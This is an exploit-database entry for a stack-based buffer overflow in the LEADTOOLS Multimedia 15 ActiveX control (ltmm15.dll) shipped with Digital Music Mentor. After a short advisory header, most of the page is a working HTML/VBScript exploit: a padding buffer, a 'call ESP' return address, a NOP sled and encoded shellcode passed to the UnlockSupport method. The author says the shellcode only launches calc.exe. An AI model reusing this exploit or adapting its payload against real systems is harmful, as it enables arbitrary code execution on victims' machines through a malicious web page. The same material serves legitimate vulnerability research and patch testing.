header-logo
Suggest Exploit
vendor:
LEADTOOLS Multimedia
by:
shinnai
7.5
CVSS
HIGH
Stack-based Buffer Overflow
119
CWE
Product Name: LEADTOOLS Multimedia
Affected Version From: LEADTOOLS Multimedia 15
Affected Version To: LEADTOOLS Multimedia 15
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2

LEADTOOLS Multimedia ActiveX Control Method Stack-based Buffer Overflow Vulnerability

LEADTOOLS Multimedia is prone to a stack-based buffer-overflow vulnerability because the software fails to adequately check boundaries on data supplied to an ActiveX control method. An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.

Mitigation:

Apply the latest patches and updates from the vendor. Do not download or open files from untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24035/info

LEADTOOLS Multimedia is prone to a stack-based buffer-overflow vulnerability because the software fails to adequately check boundaries on data supplied to an ActiveX control method.

An attacker can exploit this issue to execute arbitrary code in the context of a user running the application. Failed attempts will likely result in denial-of-service conditions.

LEADTOOLS Multimedia 15 is vulnerable; other versions may also be affected.

NOTE: The 'Ltmm15.dll' ActiveX control is included in Digital Music Mentor 2.6.0.4. Other applications may also include the ActiveX control. 

<span 
class="general1-symbol">--------------------------------------------------------------------------------
 Sienzo Digital Music Mentor (DMM) 2.6.0.4 (ltmm15.dll) Buffer Overflow 
Exploit
 url: http://www.sienzo.com/
 price: $59.95

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 full patched
 
 <b>ltmm15.dll v. 15.1.0.2 is vulnerable to a stack-based buffer 
overflow that 
 allows arbitrary code execution.</b>

 <font color="red"><b>This exploits just open calc.exe</b></font>
--------------------------------------------------------------------------------

<object classid="clsid:00150BA1-B1BA-11CE-ABC6-F5B2E79D9E3F" 
id="test"></object>

<input language="VBScript" onclick="tryMe()" value="Click here to start 
the LockModules test" type="button">

<script language="vbscript">
 Sub tryMe
  buff      = String(296,"A")

  get_EIP   = unescape("%EB%AA%3F%7E") 'call ESP (from user32.dll)

  nop       = unescape("%90%90%90%90%90%90%90%90%90%90%90%90")

  shellcode = 
unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
              
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
              
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
              
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
              
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
              
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
              
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
              
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
              
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
              
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
              
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
              
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
              
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
              
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
              
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
              
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
              
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
              
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
              
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
              
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
              
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")

  egg       = buff + get_EIP + nop + shellcode + nop

  test.UnlockSupport 1, egg
 End Sub
</script>
</span>